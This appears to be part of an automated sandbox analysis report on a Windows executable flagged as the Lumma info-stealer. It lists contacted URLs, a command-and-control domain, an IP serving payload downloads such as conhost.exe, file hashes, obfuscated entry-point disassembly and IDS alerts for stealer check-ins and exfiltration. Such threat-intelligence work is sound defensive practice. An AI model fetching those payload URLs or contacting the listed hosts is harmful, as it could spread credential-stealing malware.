                                        http://147.45.47.81/conhost.exefkydjyhjadg.exe, 00000000.00000002.2018533373.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685171231.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.ecosia.org/newtab/fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://atten-supporse.biz/api:Sfkydjyhjadg.exe, 00000000.00000002.2018255121.000000000093E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfkydjyhjadg.exe, 00000000.00000003.1501043188.0000000003BC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44fkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ac.ecosia.org/autocomplete?q=fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://147.45.47.81/8fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://atten-supporse.biz/26fkydjyhjadg.exe, 00000000.00000002.2019407520.0000000003933000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685192530.0000000003932000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://147.45.47.81/1fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.c.lencr.org/0fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://x1.i.lencr.org/0fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctafkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://147.45.47.81/odedfkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://atten-supporse.biz/qfkydjyhjadg.exe, 00000000.00000003.1566111992.00000000009F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://atten-supporse.biz/fkydjyhjadg.exe, 00000000.00000003.1561157838.0000000003932000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1534098413.0000000003933000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566057032.000000000392F000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1530072898.0000000003932000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1530971997.0000000003932000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1496162984.0000000003926000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018255121.000000000096B000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1495548222.000000000391F000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566111992.00000000009F8000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1494700759.000000000391C000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1501024723.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566092238.0000000003930000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1533610600.0000000003932000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1579126128.000000000391D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.enigmaprotector.com/fkydjyhjadg.exe, 00000000.00000002.2017786925.0000000000124000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                    high
                                                                    https://support.mozilla.org/products/firefoxgro.allfkydjyhjadg.exe, 00000000.00000003.1501043188.0000000003BC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        147.45.47.81
                                                                        unknownRussian Federation
                                                                        2895FREE-NET-ASFREEnetEUfalse
                                                                        172.67.165.166
                                                                        atten-supporse.bizUnited States
                                                                        13335CLOUDFLARENETUSfalse
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1565835
                                                                        Start date and time:2024-11-30 22:29:31 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 40s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Run name:Run with higher sleep bypass
                                                                        Number of analysed new started processes analysed:8
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:fkydjyhjadg.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@1/2
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 3
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target fkydjyhjadg.exe, PID 7644 because there are no executed function
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: fkydjyhjadg.exe
                                                                        No simulations
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        147.45.47.81Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 147.45.47.81/conhost.exe
                                                                        Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 147.45.47.81/conhost.exe
                                                                        Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 147.45.47.81/conhost.exe
                                                                        n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                        • 147.45.47.81/WinRing0x64.sys
                                                                        PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                        • 147.45.47.81/WinRing0x64.sys
                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                        • 147.45.47.81/conhost.exe
                                                                        Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 147.45.47.81/conhost.exe
                                                                        inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                        • 147.45.47.81/conhost.exe
                                                                        BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                        • 147.45.47.81/WinRing0x64.sys
                                                                        CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                        • 147.45.47.81/WinRing0x64.sys
                                                                        172.67.165.166Purchase Order#23113.exeGet hashmaliciousFormBookBrowse
                                                                        • www.xaqh.info/vr01/?Vr=L4nHMf5x&YN9P-lUP=IPhgDyoL8PETBIlA+LipHiQIJ5tdYs8vDEe7V5bx7imqp8ZSB+vz7lbDvtba/1SpkLzf
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        atten-supporse.bizSolara.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.16.9
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                        • 172.67.165.166
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                        • 104.21.16.9
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.16.9
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        FREE-NET-ASFREEnetEUKBKHHYI29L.msiGet hashmaliciousAmadeyBrowse
                                                                        • 147.45.47.167
                                                                        nklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                        • 193.233.234.120
                                                                        https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.orgGet hashmaliciousHTMLPhisherBrowse
                                                                        • 147.45.178.112
                                                                        w3gnakXO9S.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                        • 193.233.132.12
                                                                        TuohOGyKsk.exeGet hashmaliciousUnknownBrowse
                                                                        • 193.233.203.37
                                                                        TuohOGyKsk.exeGet hashmaliciousUnknownBrowse
                                                                        • 193.233.203.37
                                                                        ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                                                                        • 147.45.44.131
                                                                        Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 147.45.47.81
                                                                        Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 147.45.47.81
                                                                        Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 147.45.47.81
                                                                        CLOUDFLARENETUSkohjaekdfth.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                        • 104.26.13.205
                                                                        kthkksefd.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                        • 104.26.13.205
                                                                        jhnykawfkth.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                        • 104.26.12.205
                                                                        gjawedrtg.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.82.174
                                                                        fsyjawdr.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.82.174
                                                                        bxftjhksaef.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.160.80
                                                                        Solara.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.16.9
                                                                        kfhtksfesek.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.19.213
                                                                        Solara.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.209.111
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1gjawedrtg.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        fsyjawdr.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        bxftjhksaef.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        Solara.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        kfhtksfesek.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        Solara.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.165.166
                                                                        jre-8u4521-windows-x64.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.165.166
                                                                        No context
                                                                        No created / dropped files found
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.986396852374167
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:fkydjyhjadg.exe
                                                                        File size:1'278'464 bytes
                                                                        MD5:b2c8bf8a5797d9ee73c205e27cfdbbfb
                                                                        SHA1:da8b2fa38e7c0fef5d13cef94f0028b75e05e8ab
                                                                        SHA256:784bcd0555e5e1ab25b212f28bd84b64eac99270afb0a73fb4cd92fb737d6c7f
                                                                        SHA512:aa5d2bdb1d00faf877502c35ef5716c5ccfde18c26deebd7436e246b9a82069fd8834b8b8c24adfdf5bf89385c214b49ec4c5d6021f6ac72b0d8b998ad223ec2
                                                                        SSDEEP:24576:kMnfGPxgVa9CaVmOqF3x3UtfwDwxOD9xD5CDRQ7jb52OGxu:kMfGPxgOVpo3xcbc9B5CDRQ7jb50u
                                                                        TLSH:794533645B303F8ECDFBF87DA551F05553A580C2683A48B72A1A30E61B16F1A866DF3C
                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...@0Gg............................&.............@...........................;...........@................................. p-....
                                                                        Icon Hash:00928e8e8686b000
                                                                        Entrypoint:0x412e26
                                                                        Entrypoint Section:
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x67473040 [Wed Nov 27 14:44:16 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:71cc5af9daad65e58c6f29c42cdf9201
                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFF0h
                                                                        mov eax, 00401000h
                                                                        call 00007F3FF51BD2C6h
                                                                        call far 5DE5h : 8B10C483h
                                                                        jmp 00007F3FF5564E6Bh
                                                                        clc
                                                                        out dx, eax
                                                                        jl 00007F3FF51BD2D4h
                                                                        ror esi, 58h
                                                                        idiv ecx
                                                                        pop esp
                                                                        inc ebx
                                                                        push FFFFFF91h
                                                                        cmc
                                                                        je 00007F3FF51BD2B0h
                                                                        jnp 00007F3FF51BD2C7h
                                                                        loop 00007F3FF51BD252h
                                                                        xor dword ptr [eax+12C4CA68h], edx
                                                                        or eax, A43B4ECEh
                                                                        jno 00007F3FF51BD2AEh
                                                                        xor al, 45h
                                                                        xchg eax, esp
                                                                        mov dh, EFh
                                                                        sub ah, bl
                                                                        adc al, 34h
                                                                        test dword ptr [ebx], ebx
                                                                        sub dword ptr [ebx], 91F45039h
                                                                        in al, dx
                                                                        fiadd word ptr [eax+03h]
                                                                        or esp, 4AAD09B9h
                                                                        outsd
                                                                        xchg eax, edi
                                                                        rcr dword ptr [edi-0Dh], 1
                                                                        in al, dx
                                                                        scasd
                                                                        jnbe 00007F3FF51BD254h
                                                                        or byte ptr [edi+09h], ah
                                                                        mov dword ptr [edi+79EF9FADh], ebp
                                                                        neg dword ptr [esi+06D6ED82h]
                                                                        test bl, cl
                                                                        rcr dword ptr [edi+0Eh], 7Dh
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2d70200x214.data
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d70000xc.data
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        0x10000x3f0000x20c00291cb6b731d751a3a5ad7d4700c065c2False0.9995601741412213data7.998422403780575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        0x400000x30000xe00eb0251cae712b406f53eab2655310b31False0.9854910714285714data7.89367915472244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        0x430000x100000x3400c90969e3e7fb0b289f08ec7164487f8cFalse0.9749849759615384data7.921647567448789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        0x530000x10000x2007eb0f77a1f13999a37f83a792b059f74False0.04296875data0.1794325416558982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        0x540000x40000x2400d2c0ad62bad5c504992f11666e796a04False0.9557291666666666DOS executable (COM)7.846300396379283IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        0x580000x27f0000x2ba009b19b508d4406778a910449fe32d2472unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .data0x2d70000xe50000xe500052cbf0d50064185d3c6bd937f4949469False0.996925320687773data7.977531258783219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        DLLImport
                                                                        kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                        user32.dllMessageBoxA
                                                                        advapi32.dllRegCloseKey
                                                                        oleaut32.dllSysFreeString
                                                                        gdi32.dllCreateFontA
                                                                        shell32.dllShellExecuteA
                                                                        version.dllGetFileVersionInfoA
                                                                        ole32.dllCoCreateInstance
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-30T22:30:25.324602+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706172.67.165.166443TCP
                                                                        2024-11-30T22:30:27.042968+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849706172.67.165.166443TCP
                                                                        2024-11-30T22:30:27.042968+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706172.67.165.166443TCP
                                                                        2024-11-30T22:30:28.409310+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707172.67.165.166443TCP
                                                                        2024-11-30T22:30:29.523262+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849707172.67.165.166443TCP
                                                                        2024-11-30T22:30:29.523262+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707172.67.165.166443TCP
                                                                        2024-11-30T22:30:31.200859+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708172.67.165.166443TCP
                                                                        2024-11-30T22:30:33.849234+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709172.67.165.166443TCP
                                                                        2024-11-30T22:30:36.656991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710172.67.165.166443TCP
                                                                        2024-11-30T22:30:40.015292+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849711172.67.165.166443TCP
                                                                        2024-11-30T22:30:40.876959+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849711172.67.165.166443TCP
                                                                        2024-11-30T22:30:43.202591+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714172.67.165.166443TCP
                                                                        2024-11-30T22:30:47.705064+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715172.67.165.166443TCP
                                                                        2024-11-30T22:30:48.487809+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849715172.67.165.166443TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 30, 2024 22:30:23.955790997 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:23.955842972 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:23.955919027 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:23.958888054 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:23.958905935 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:25.324507952 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:25.324601889 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:25.382780075 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:25.382797003 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:25.383043051 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:25.433723927 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:25.915721893 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:25.915750027 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:25.915889025 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:27.042978048 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:27.043066025 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:27.043126106 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:27.045078039 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:27.045099020 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:27.045109987 CET49706443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:27.045114994 CET44349706172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:27.088186026 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:27.088239908 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:27.088329077 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:27.088619947 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:27.088646889 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:28.409220934 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:28.409310102 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:28.505971909 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:28.505992889 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:28.506303072 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:28.526731968 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:28.526766062 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:28.526819944 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.523248911 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.523508072 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.523538113 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.523555994 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.523574114 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.523622036 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.523992062 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.531552076 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.531599045 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.531608105 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.533289909 CET44349707172.67.165.166192.168.2.8
